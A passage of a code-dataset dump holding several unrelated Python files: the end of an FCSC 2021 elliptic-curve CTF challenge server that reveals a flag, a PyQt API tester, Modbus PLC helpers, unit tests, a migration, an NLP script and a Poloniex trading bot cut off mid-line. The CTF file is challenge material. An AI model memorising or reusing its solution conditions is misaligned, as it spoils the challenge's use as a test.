equation: y^2 = x^3 + a*x + b (mod p)?\")\nprint(\"I will give you two points:\")\nprint(f\"P = ({P.x}, {P.y})\")\nprint(f\"Q = ({Q.x}, {Q.y})\")\n\ntry:\n\ta = int(input(\">>> a = \"))\n\tb = int(input(\">>> b = \"))\n\tp = int(input(\">>> p = \"))\n\n\tC = Curve(\"Check\", p, a, b, 0, 0, 0)\n\tcheck = True\n\tcheck &= p.bit_length() >= BITS\n\tcheck &= (P.x ** 3 + a * P.x + b - P.y ** 2) % p == 0\n\tcheck &= (Q.x ** 3 + a * Q.x + b - Q.y ** 2) % p == 0\n\tcheck &= (2 * Point(P.x, P.y, C) == Point(Q.x, Q.y, C))\n\tif check:\n\t\tprint(\"Congratulations!! 
Here is your flag:\")\n\t\tprint(open(\"flag.txt\", \"r\").read())\n\telse:\n\t\tprint(\"That's not it!\")\nexcept:\n\tprint(\"That's not it!\")\n","repo_name":"Antoine-Gicquel/FCSC2021-writeups","sub_path":"Crypto/Lost Curve/lost_curve.py","file_name":"lost_curve.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26945943564","text":"from PyQt4 import QtGui, QtCore\r\nimport sys\r\nimport main_design\r\nimport json_creator_design\r\nimport new_line_design\r\nimport requests\r\nimport re\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport shutil\r\nimport json\r\nimport time\r\nfrom jason_creator import JsonCreator\r\nfrom settings import Settings\r\nfrom check_code import CheckCode\r\nfrom additional_testing import AdditionalTesting\r\nfrom new_line import NewLine\r\nfrom report_window import ViewReport\r\nfrom class_test import Response, GetMethod, PostMethod, DeleteMethod\r\nfrom resource_class import Resource\r\nfrom callbacks_test import CallbacksTest\r\nfrom doctest import testfile\r\n#from idlelib.ClassBrowser import file_open\r\nfrom PyQt4.Qt import QListWidgetItem\r\nfrom PyQt4.QtCore import QThread, SIGNAL\r\nimport logging\r\n\r\n\r\nclass LineExec(QThread):\r\n\r\n def __init__(self, mainJson):\r\n QThread.__init__(self)\r\n self.mainJson = mainJson\r\n\r\n def run(self):\r\n for line in self.mainJson:\r\n self.emit(SIGNAL(\"line_exec(PyQt_PyObject)\"), line)\r\n self.sleep(2)\r\n\r\n\r\nclass TestApp(QtGui.QMainWindow, main_design.Ui_Dialog):\r\n def __init__(self, parent=None):\r\n super(TestApp, self).__init__(parent)\r\n self.setupUi(self)\r\n\r\n self.txtFilePath = []\r\n self.txtFileUUID = []\r\n self.uploadFileUUID = []\r\n self.testFilePath = []\r\n self.newLineTest = [False]\r\n self.testFile = None\r\n\r\n self.errorNumber.display(0)\r\n\r\n self.printText = ['']\r\n self.json_work = JsonCreator(None, self.newLineTest)\r\n self.check_code = CheckCode(None)\r\n self.new_line = NewLine(self.newLineTest)\r\n self.settings = Settings()\r\n self.additional_tests = AdditionalTesting()\r\n self.new_line_window = None\r\n self.startBtn.clicked.connect(self.start_test)\r\n self.pushButton_2.clicked.connect(self.close_application)\r\n self.fileLoad.clicked.connect(self.file_open)\r\n self.checkDisplay.clicked.connect(self.check_the_code)\r\n self.reportBtn.clicked.connect(self.new_report)\r\n self.settingsBtn.clicked.connect(self.settings_window)\r\n self.ad_proj.clicked.connect(self.callbacks_test)\r\n\r\n self.tableWidget.setColumnCount(2)\r\n self.tableWidget.setColumnWidth(0, 400)\r\n self.tableWidget.setHorizontalHeaderLabels(\"Title;Status\".split(\";\"))\r\n self.tableWidget.horizontalHeader().setResizeMode(1, QtGui.QHeaderView.Stretch)\r\n\r\n self.errorFlag = [False]\r\n self.prevResponse = {}\r\n self.prevPayload = {}\r\n\r\n self.priceList = {}\r\n\r\n def start_test(self):\r\n self.txtFileUUID = []\r\n self.uploadFileUUID = []\r\n self.firstResourcesUpload = [False]\r\n with open('./data/setup.json') as codeLines_data:\r\n self.setupJson = json.load(codeLines_data)\r\n\r\n self.secretKey = self.setupJson['secret_key']\r\n self.publicKey = self.setupJson['public_key']\r\n self.httpAddress = self.setupJson['https']\r\n self.txtFilePath = self.settings.get_txt_path()\r\n self.testFilePath = self.settings.get_file_path()\r\n self.priceList = {\"reg_proj\": float(self.setupJson['reg_proj']),\r\n \"expert_proj\": 
float(self.setupJson['expert_proj']),\r\n \"proof_proj\": float(self.setupJson['proof_proj']),\r\n \"transcript_proj\": float(self.setupJson['transcript_proj']),\r\n \"combo_proj\": float(self.setupJson['combo_proj'])}\r\n self.errorNumber.display(0)\r\n\r\n if self.check_code.testFile:\r\n with open(self.check_code.testFile) as codeLines_data:\r\n data = json.load(codeLines_data)\r\n elif self.newLineTest[0]:\r\n with open('./data/new_line.json') as codeLines_data:\r\n data = json.load(codeLines_data)\r\n else:\r\n with open('./test_lines/00_Complete_Test.json') as codeLines_data:\r\n data = json.load(codeLines_data)\r\n\r\n while self.tableWidget.rowCount() > 0:\r\n self.tableWidget.removeRow(0)\r\n\r\n with open('./report/test_report.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/languages.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/open_projects.json', \"w\") as new:\r\n json.dump({\"projects\": []}, new)\r\n\r\n with open('./data/words_prices.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/firstUpload.json') as codeLines_data:\r\n firstUpload = json.load(codeLines_data)\r\n\r\n for firstU in firstUpload[\"data\"]:\r\n if str.lower(firstU[\"method\"]) == 'post':\r\n checkLine = PostMethod(firstU)\r\n checkLine.post_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath,\r\n self.txtFileUUID, self.testFilePath, self.uploadFileUUID,\r\n self.prevResponse, self.prevPayload, self.tableWidget,\r\n self.firstResourcesUpload, self.errorNumber)\r\n\r\n elif str.lower(firstU[\"method\"]) == 'get':\r\n checkLine = GetMethod(firstU)\r\n checkLine.get_method(self.secretKey, self.publicKey, self.httpAddress, self.prevResponse,\r\n self.prevPayload, self.tableWidget, self.testFilePath, self.uploadFileUUID,\r\n self.txtFileUUID, self.errorNumber)\r\n\r\n self.firstResourcesUpload[0] = True\r\n\r\n # payload = dict()\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n Deletes the existing Downloads\r\n directory to check up to date\r\n files.\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n if os.path.exists(\"Downloads\"):\r\n shutil.rmtree(\"Downloads\")\r\n\r\n self.initialize_data()\r\n\r\n self.progressBar.setMaximum(len(data[\"data\"]))\r\n self.progressBar.setValue(0)\r\n self.linePrint = LineExec(data[\"data\"])\r\n self.connect(self.linePrint, SIGNAL(\"line_exec(PyQt_PyObject)\"), self.line_exec)\r\n self.linePrint.start()\r\n self.stopBtn.setEnabled(True)\r\n self.stopBtn.clicked.connect(self.linePrint.terminate)\r\n\r\n def initialize_data(self):\r\n entry = {}\r\n with open('./data/words_prices.json') as codeLines_data:\r\n mainJson = json.load(codeLines_data)\r\n\r\n with open('./data/words_prices.json', 'w') as outfile:\r\n\r\n for txtUUID in self.txtFileUUID:\r\n uploaded_file = Resource(self.txtFilePath[self.txtFileUUID.index(txtUUID)], self.priceList)\r\n entry[txtUUID] = {'wordcount': uploaded_file.get_wordcount(),\r\n 'reg_proj_price': uploaded_file.get_reg_project_price(),\r\n 'expert_proj_price': uploaded_file.get_expert_project_price(),\r\n 'proof_proj_price': uploaded_file.get_proof_proj_price(),\r\n 'trranscrip_proj_price': uploaded_file.get_transcript_proj_price(),\r\n 'combo_proj_price': uploaded_file.get_combo_price()}\r\n\r\n mainJson.append(entry)\r\n\r\n for fileUUID in self.uploadFileUUID:\r\n uploaded_file = Resource(self.testFilePath[self.uploadFileUUID.index(fileUUID)], self.priceList)\r\n entry[fileUUID] = {'wordcount': 
uploaded_file.get_wordcount(),\r\n 'reg_proj_price': uploaded_file.get_reg_project_price(),\r\n 'expert_proj_price': uploaded_file.get_expert_project_price(),\r\n 'proof_proj_price': uploaded_file.get_proof_proj_price(),\r\n 'trranscrip_proj_price': uploaded_file.get_transcript_proj_price(),\r\n 'combo_proj_price': uploaded_file.get_combo_price()}\r\n mainJson.append(entry)\r\n\r\n json.dump(mainJson, outfile)\r\n\r\n def line_exec(self, line):\r\n if str.lower(line[\"method\"]) == 'get':\r\n # payload initialization\r\n checkLine = GetMethod(line)\r\n checkLine.get_method(self.secretKey, self.publicKey, self.httpAddress, self.prevResponse,\r\n self.prevPayload, self.tableWidget, self.testFilePath, self.uploadFileUUID,\r\n self.txtFileUUID, self.errorNumber)\r\n\r\n # Post line code\r\n elif str.lower(line[\"method\"]) == 'post':\r\n checkLine = PostMethod(line)\r\n checkLine.post_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath, self.txtFileUUID,\r\n self.testFilePath, self.uploadFileUUID, self.prevResponse, self.prevPayload,\r\n self.tableWidget, self.firstResourcesUpload, self.errorNumber)\r\n\r\n elif str.lower(line[\"method\"]) == 'delete':\r\n checkLine = DeleteMethod(line)\r\n checkLine.delete_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath, self.txtFileUUID,\r\n self.testFilePath, self.uploadFileUUID, self.prevResponse, self.prevPayload,\r\n self.tableWidget, self.firstResourcesUpload, self.errorNumber)\r\n\r\n self.progressBar.setValue(self.progressBar.value() + 1)\r\n\r\n def file_open(self):\r\n self.new_line_window = NewLine(self.newLineTest)\r\n self.new_line_window.show()\r\n\r\n def check_the_code(self):\r\n self.check_code.show()\r\n\r\n def new_report(self):\r\n self.viewReport = ViewReport(self.tableWidget)\r\n self.viewReport.show()\r\n\r\n def close_application(self):\r\n # popup messegae before exiting\r\n choice = QtGui.QMessageBox.question(self, 'Quit', \"Quit application?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\r\n\r\n if choice == QtGui.QMessageBox.Yes:\r\n sys.exit()\r\n else:\r\n pass\r\n\r\n def settings_window(self):\r\n self.settings.show()\r\n\r\n def additional_window(self):\r\n self.additional_tests = AdditionalTesting()\r\n self.additional_tests.show()\r\n\r\n def callbacks_test(self):\r\n CallbacksTest(self.tableWidget, self.errorNumber)\r\n\r\nclass StreamToLogger(object):\r\n \"\"\"\r\n Fake file-like stream object that redirects writes to a logger instance.\r\n \"\"\"\r\n\r\n def __init__(self, logger, log_level=logging.INFO):\r\n self.logger = logger\r\n self.log_level = log_level\r\n self.linebuf = ''\r\n\r\n def write(self, buf):\r\n for line in buf.rstrip().splitlines():\r\n self.logger.log(self.log_level, line.rstrip())\r\n\r\n\r\n logging.basicConfig(\r\n level=logging.DEBUG,\r\n format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\r\n filename=\"main_log.log\",\r\n filemode='w+')\r\n\r\n def flush(self):\r\n pass\r\n\r\ndef main():\r\n # Logging - commented off, else On\r\n stdout_logger = logging.getLogger('STDOUT')\r\n sl = StreamToLogger(stdout_logger, logging.INFO)\r\n sys.stdout = sl\r\n\r\n stderr_logger = logging.getLogger('STDERR')\r\n sl = StreamToLogger(stderr_logger, logging.ERROR)\r\n sys.stderr = sl\r\n \r\n app = QtGui.QApplication(sys.argv)\r\n app.setStyle('cleanlooks')\r\n form = TestApp()\r\n form.show()\r\n app.exec_()\r\n sys.stdout = sys.__stdout__\r\n sys.stderr = sys.__stderr__\r\nif __name__ == '__main__':\r\n 
main()\r\n","repo_name":"yvgenyk/API-Test2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32795571796","text":"# -*- coding: utf-8 -*-\n#---\nc = None\n\ndef centroMassa(size):\n return (round(size[0]/2),round(size[1]/2))\n\ndef openCLP(ip,q):\n from pyModbusTCP.client import ModbusClient\n print('Execuntado processo',ip)\n c = ModbusClient(host=ip, auto_open=True, auto_close=True)\n if c.open():\n print('Conexao completada')\n q.put(c)\n\ndef conexaoCLP(ip=''):\n print('Criando conexao')\n from pyModbusTCP.client import ModbusClient\n c = ModbusClient(host=ip, auto_open=False, auto_close=False)\n if c.open():\n print('Conexao realizada com sucesso!!')\n regs_list_1 = c.read_holding_registers(0, 10)\n regs_list_2 = c.read_holding_registers(55, 10)\n c.close()\n return c\n return False\n \ndef lerCLP(obj, registro):\n import time\n # obj.debug = True\n for s in range(0,65535):\n k = obj.read_holding_registers(s, 10)\n time.sleep(.01)\n print(f'registro:{s} value: {k}')\n \ndef escreverCLP(obj, registro,value):\n if obj.open():\n obj.write_multiple_registers(registro, value)\n \n \ndef lerTagsCSV():\n import pandas as pd\n df = pd.read_csv('libs/assets/tags_ug2.csv',sep=',',names=['name','device','type','address','x','sinal']) #usecols=[])\n # cols = iter(['index','name','device','address','x','sinal'])\n # for col in df.columns:\n # df = df.rename(columns={col: next(cols)},inplace = True)\n return df\n print(df.shape)\n print(df.columns)\n \ndef convertDataFrame(dados,colunas):\n print(dados)\n \n \ndef rastrearIP(HOST):\n import socket\n\n # HOST ='192.168.10' # Standard loopback interface address (localhost)\n # PORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n for host_ in [f'{HOST}.{str(i)}' for i in range(1,255)]:\n print(host_)\n for port in range(1,65000):\n print(host_,':',port)\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((str(host_).strip(), str(port).strip()))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr)\n # while True:\n # data = conn.recv(1024)\n # if not data:\n # break\n # conn.sendall(data)\n\ncores = {\n 'back':'#D9D9D9',\n 'card':'#FFFFFF',\n 'inputLine':'#333333',\n 'buttonOFF': '#333333',\n 'buttonON':'#17B556',\n 'buttonRead':'#125F80',\n 'buttonWrite':'#0F2983',\n 'displayON':'#08BB24',\n 'displayOFF':'#000000',\n }","repo_name":"MilianoJunior/test_plataform","sub_path":"libs/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40999407282","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"Unittest for the target property classes of mfng.py.\"\"\"\n\nimport mfng\nimport unittest\nimport numpy\nfrom known_values import known_values\n\nclass CreationTests(unittest.TestCase):\n\n def testDistributionFunctionValues(self):\n \"The value of the DistributionFunction should be correct.\"\n distfunc = mfng.DistributionFunction(\"2*numpy.exp(-k)\", 100)\n self.assertAlmostEqual(distfunc.value(numpy.log(8)), 0.25)\n\n# def testEnergy(self):\n# df=mfng.DistributionFunction(\"2*numpy.exp(-k)\", 100)\n# pm=mfng.ProbMeasure()\n# lpm=pm.iterate(3)\n# self.assertAlmostEqual(df.energy(lpm, 400)[0], -97.436661566437408)\n#\n# def testEnergy2(self):\n# divs= [0.13193312663039208, 1.0]\n# probs=numpy.array([[ 0.25904704, 
0.30615741],\n# [ 0.30615741, 0.12863815]])\n# pm=mfng.ProbMeasure(divs, probs)\n# lpm=pm.iterate(3)\n# df=mfng.DistributionFunction(\"k**-3\", 100, mindeg=1)\n# self.assertAlmostEqual(df.energy(lpm, 400)[0], -92.244977910442273)\n\nclass EnergyTests(unittest.TestCase):\n\n def testDistributionFunctionValues(self):\n \"The energy of the DistributionFunction should be correct.\"\n for i in range(2):\n divs = known_values[i][\"divs\"]\n probs = known_values[i][\"probs\"]\n energy = known_values[i][\"energy\"]\n\n pm = mfng.ProbMeasure(divs, probs)\n lpm = pm.iterate(4)\n prop = mfng.DistributionFunction('k**-2', maxdeg=2000-1, mindeg=1)\n self.assertAlmostEqual(prop.energy(lpm, 2000)[0], energy)\n prop = mfng.DistributionFunctionC('k**-2', maxdeg=2000-1, mindeg=1)\n self.assertAlmostEqual(prop.energy(pm, 2000)[0], energy, places=4)\n\ndef suite():\n energy_suite = unittest.makeSuite(EnergyTests)\n creation_suite = unittest.makeSuite(CreationTests)\n return unittest.TestSuite([energy_suite, creation_suite])\n\ndef test():\n runner = unittest.TextTestRunner()\n runner.run(suite())\n\nif __name__ == \"__main__\":\n test()\n\n","repo_name":"horvatha/mfng","sub_path":"mfng/tests/test_DistributionFuntion.py","file_name":"test_DistributionFuntion.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"6154360596","text":"\"\"\"change_nullable\n\nRevision ID: d31f8eea5092\nRevises: 14ba29293ee5\nCreate Date: 2020-05-22 22:32:57.599769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd31f8eea5092'\ndown_revision = '14ba29293ee5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('leads', 'name',\n existing_type=sa.VARCHAR(length=150),\n nullable=True,\n existing_comment='ФИО или название компании')\n # ### end Alembic commands ###\n\n op.execute(\"\"\"\n ALTER TABLE leads ALTER COLUMN incoming_date SET DEFAULT current_date;\n \"\"\")\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('leads', 'name',\n existing_type=sa.VARCHAR(length=150),\n nullable=False,\n existing_comment='ФИО или название компании')\n # ### end Alembic commands ###\n","repo_name":"zorik19/bankProject","sub_path":"source/migrations/alembic/versions/d31f8eea5092_change_nullable.py","file_name":"d31f8eea5092_change_nullable.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23104335701","text":"import pandas as pd\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import SnowballStemmer\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\n\ntest_filename = '../data/test.csv'\ntrain_filename = '../data/train.csv'\nvalid_filename = '../data/valid.csv'\n\ntrain_news = pd.read_csv(train_filename)\ntest_news = pd.read_csv(test_filename)\nvalid_news = pd.read_csv(valid_filename)\n\n\nstemmer = SnowballStemmer('english')\ntrain_s=[' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in train_news['Statement']]\ntest_s=[' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in test_news['Statement']]\n\n\n\nlemmatizer = nltk.stem.WordNetLemmatizer()\ntrain_l=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in train_news['Statement']]\ntest_l=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in test_news['Statement']]\n\ntrain_sl=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in train_s]\ntest_sl=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in test_s]\n\ndef stem (sentence):\n answ = [' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in sentence]\n\n return answ\n\ndef lemmatize (sentence):\n answ = [' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in sentence]\n\n return answ\n","repo_name":"mikub97/fakenews2","sub_path":"src/machinelearning/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43475649122","text":"# -*-coding:UTF-8 -*\nimport configparser\nimport logging\nfrom os.path import dirname, abspath, join\n\nimport model.game\nimport model.service\nimport model.team\nfrom model import properties\nfrom model.properties import SETTINGS_FILE\n\nlog = logging.getLogger('default')\n\n\ndef logger_setup():\n config = configparser.ConfigParser()\n config.read(SETTINGS_FILE)\n log.setLevel(logging.DEBUG)\n # console handler\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n log.addHandler(sh)\n # create file handler which logs even debug messages\n log_file = join(abspath(dirname(dirname(__file__))), config[\"MISC\"][\"log_file\"])\n fh = logging.FileHandler(log_file, mode='a', encoding='utf-8')\n formatter = logging.Formatter('%(asctime)s [%(levelname)s]\\t%(message)s', datefmt='%m/%d/%Y %H:%M:%S')\n fh.setFormatter(formatter)\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n log.debug(\"#################### NEW INSTANCE ####################\")\n\n\ndef initialize():\n logger_setup()\n properties.parse_settings()\n model.service.setup_db()\n\n\n","repo_name":"vdsbenoit/baden","sub_path":"baden/controller/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} 
+{"seq_id":"39808737962","text":"#!/usr/bin/env python3\n# Before running this script you need to\n# 1) Install Python 3 (select add to PATH)\n# 2) Type in CMD: python -m pip install --upgrade pip\n# 3) Type in CMD: pip3 install https://github.com/s4w3d0ff/python-poloniex/archive/v0.4.7.zip\n# 4) Adjust in this script on line 29: 'Your_Poloniex_Key_Here' & 'Your_Poloniex_Secret_Here'\n# 5) In CMD Navigate to PoloniexTradeBot folder\n# 6) Run the script: python AllCoinsInBTC.py 0.001 \n# Where 0.001 is the BTC Value for each Altcoin \n# Script by BitcoinDaytraderChannel@gmail.com\n# Youtube.com/c/BitcoinDaytrader\n \n# Import Standard Library Modules\nimport time\nimport sys\n# Import the External Poloniex Library (python-poloniex-master folder + PIP install poloniex)\nimport poloniex \nfrom poloniex import Poloniex\n\ntry: # First check for user BTC Value input\n\tbudget = str(sys.argv[1])#.format('0.001')\nexcept: # Print an Exeption (error) if there is no input\n\tprint(\"put Budget in as python AllCoinsInBTC.py 0.001\")\n\texit(1)\n\nwhile True: # Setup to connect to Poloniex API\n\ttry:\n\t\tpolo = Poloniex()\n\t\tpolo.key = 'Your_Poloniex_Key_Here'\n\t\tpolo.secret = 'Your_Poloniex_Secret_Here'\n\t\tprint(\" \")\n\t\tprint(\"---!Connected to Poloniex.com!---\")\n\t\tbreak\n\texcept:\n\t\tbackoff(\"Can not connect to Poloniex API\")\n\t\texit(1)\n\t\t\ndef backoff(msg): # Function for the Error Message later in script\n print(msg)\n time.sleep(0.1)\n\ndef decor (func):\n\tdef wrap():\n\t\tprint(\" #################\")\n\t\tfunc()\n\t\tprint(\" #################\")\n\treturn wrap\n\n@decor #send print_budget to decor function \ndef print_budget():\n\tprint(\" # Budget=\", budget , \"#\") # Show budget input\n@decor\ndef print_pair():\n\tprint(\"# Market =\", pair , \"#\") # Show name of Market\n\t\t\t\nif __name__ == '__main__':\t# Start the main BUY/SELL script\n\tprint_budget();\n\tPoloniexCoins = [\"ARDR\",\"ATOM\",\"BAT\",\"BCHABC\",\"BCHSV\",\"BCN\",\"BNT\",\"BTS\",\"CVC\",\"DASH\",\"DCR\",\"DGB\",\"DOGE\",\"EOS\",\"ETC\",\"ETH\",\"FCT\",\"FOAM\",\"GAS\",\"GNT\",\"GRIN\",\"KNC\",\"LOOM\",\"LPT\",\"LSK\",\"LTC\",\"MANA\",\"MAID\",\"NMR\",\"NXT\",\"OMG\",\"OMNI\",\"POLY\",\"QTUM\",\"REP\",\"SC\",\"SNT\",\"STORJ\",\"STR\",\"STRAT\",\"VIA\",\"VTC\",\"XEM\",\"XMR\",\"XPM\",\"XRP\",\"ZEC\",\"ZRX\"]\n\tcounter = 0 # Where to start in list (0=AMP, 1=ARDR, 2=BAT...)\n\tmax_index = len(PoloniexCoins) - 1 # Length PoloniexCoins List - 1 List start at 0 not 1 \n\tprint(\"Total amount of Altcoins on Poloniex BTC Market = \" , max_index)\n\twhile counter <= max_index: # while = loop through PoloniexCoins List until max_index\n\t\tAltCoin = PoloniexCoins[counter] # Every loop change variable AltCoin to counter (0=AMP, 1=ARDR, 2=BAT...)\n\t\tpair = \"BTC_\" + AltCoin # Market: BTC_ + AltCoin to create coinpairs (BTC_AMP , BTC_ARDR, BTC_BAT...)\n\t\tprint_pair();\n\n\t\twhile True: #0 First check if the coinpair already has a Open Order & Cancel it\n\t\t\ttry:\n\t\t\t\treturnOpenOrders = polo.returnOpenOrders()[pair] # Collect the open orders of the coinpair\t\t\t\n\t\t\t\tif returnOpenOrders != []: # if the openorders are not empty Cancel the Order\n\t\t\t\t\treturnOrderNumber = polo.returnOpenOrders()[pair][0]['orderNumber'] # Collect last orderNumber\t\n\t\t\t\t\treturnOrderAmount = polo.returnOpenOrders()[pair][0]['amount'] # Collect OrderAmount\n\t\t\t\t\tprint(\"Open Order: \", returnOrderNumber, \"Total Amount in BTC: \" , returnOrderAmount ) # OpenOrder Info\n\t\t\t\t\tcancelOrder = 
polo.cancelOrder(returnOrderNumber)# cancel order with latest orderNumber\n\t\t\t\t\tprint(\"---!CANCEL Complete!---\") # Reloop the OpenOrder Check\t\t\t\t\t\t\n\t\t\t\telse: # if the openorders are not empty\n\t\t\t\t\t#print(\"---!No OpenOrders!---\")\n\t\t\t\t\tbreak\t\t\t\t\n\t\t\texcept: # Print an Exeption (error) if script can't collect Orders\n\t\t\t\tbackoff(\"Can not get the OpenOrder\")\n\t\t\t\texit(1) # Exit the entire script\n\t\t\n\t\twhile True: #1 get the ticker of the coinpair (LowestAsk & HighestBid Price)\n\t\t\ttry:\n\t\t\t\tAsk = polo.returnTicker()[pair]['lowestAsk'] # Collect latest Sell(ask) & Buy (bid) prices\n\t\t\t\tBid = polo.returnTicker()[pair]['highestBid']\n\t\t\t\t#print(\"Sell price in BTC = \" , Ask)\n\t\t\t\t#print(\"Buy price in BTC = \" , Bid)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not get the Ask and Bid Price\")\n\t\t\t\texit(1)\n\n\t\twhile True: #2 Get the total amount of altcoins\n\t\t\ttry:\n\t\t\t\tAltTotal = polo.returnBalances()[AltCoin] # Get the amount of the altcoin\n\t\t\t\t#print(\"I have total \", AltCoin ,\"= \" , AltTotal)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not get the total amount of coins\")\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #3 calculate the total Alt Worth in BTC\n\t\t\ttry:\n\t\t\t\tAltWorth = float(Bid) * float(AltTotal) # Float for numbers with decimals (Bid see #1) (AltTotal see #2)\n\t\t\t\t#print(\"My\" , AltCoin , \"worth in BTC = \" , AltWorth)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not calculate altcoin total worth\")\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #4 Check if the AltWorth(see #3) is Higher or Lower than Budget (script-input)\t\n\t\t\ttry:\n\t\t\t\tif float(AltWorth) >= float(budget): #Higher = SELL \n\t\t\t\t\t#print(\"AltWorth is higher then budget\")\n\t\t\t\t\tAltSellWorth = float(AltWorth) - float(budget) # Calculate how much to sell in BTC\n\t\t\t\t\tprint(\"AltSellWorth in btc = \" , AltSellWorth)\n\t\t\t\t\tAltSell = float(AltSellWorth) / float(Bid) # Calculate how much AltCoins to Sell\n\t\t\t\t\tAltBuyWorth = 100 # To fix error when not defined in => #5 Orderbook\n\t\t\t\t\tbreak # stop if loop\n\t\t\t\telse: #------------------------------#Lower = BUY \n\t\t\t\t\t#print(\"AltWorth is lower then budget\")\n\t\t\t\t\tAltBuyWorth = float(budget) - float(AltWorth) # Calculate how much to buy in BTC\n\t\t\t\t\tprint(\"AltBuyWorth in btc = \" , AltBuyWorth)\n\t\t\t\t\tAltBuy = float(AltBuyWorth) / float(Ask) # Calculate how much AltCoins to Buy\n\t\t\t\t\tAltSellWorth = 100 # To fix error when not defined in => #5 Orderbook\n\t\t\t\t\tbreak # stop else loop\t\t\t\t\t\n\t\t\texcept:\n\t\t\t\tbackoff(\"The Order does not work, Maybe to small\") # Error if can't calculate\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #5 get the orderbook of the coinpair (All Sell & Buy Orders)\n\t\t\ttry:\n\t\t\t\tMinOrder = 0.0001 # Minimal order worth in BTC = Poloniex Trading Rule\n\t\t\t\tif MinOrder > AltSellWorth: # Compare MinOrder with AltSellWorth (see #4 if)\n\t\t\t\t\tprint(\" ---SELL Order To Small To Place---\")\n\t\t\t\t\tbreak # stop if loop\n\t\t\t\telif MinOrder > AltBuyWorth: # Compare MinOrder with AltBuyWorth (see #4 else)\n\t\t\t\t\tprint(\" ---BUY Order To Small To Place---\")\n\t\t\t\t\tbreak # stop elseif loop\t \t\t\t\n\t\t\t\telse: # run the buy/sell part if order is not to small\t\t\t\t\t\t\t\n\t\t\t\t\tif float(AltWorth) >= float(budget): # SELL!!! 
Compare SellOrder with Available Bids\n\t\t\t\t\t\t#print(\"**SELL** AltWorth HIGHER budget\")\t\t\t\t\t\t\n\t\t\t\t\t\tOrderBidsPrice0 = polo.returnOrderBook()[pair]['bids'][0][0] # Collect highest buyorder (0) price\n\t\t\t\t\t\tOrderBidsAmount0 = polo.returnOrderBook()[pair]['bids'][0][1] # Collect highest buyorder (0) amount\n\t\t\t\t\t\tOrderBidsSum0 = float(OrderBidsAmount0) * float(OrderBidsPrice0) # Calculate highest buyorder BTC Value\n\t\t\t\t\t\t\n\t\t\t\t\t\tif float(AltSellWorth) <= float(OrderBidsSum0): # Sell if highest bid (in BTC) is bigger than AltSellWorth (in BTC)\n\t\t\t\t\t\t\tsell = polo.sell(pair, Bid, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in first Bid\")\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # Highest BuyOrder (0) is to small, Calculate for 1st & 2nd BuyOrder (0&1)\n\t\t\t\t\t\t\tprint(\"Order is Bigger than BidsSum0\")\n\t\t\t\t\t\t\tOrderBidsPrice1 = polo.returnOrderBook()[pair]['bids'][1][0] # Collect 2nd highest buyorder (1) price\n\t\t\t\t\t\t\tOrderBidsAmount1 = 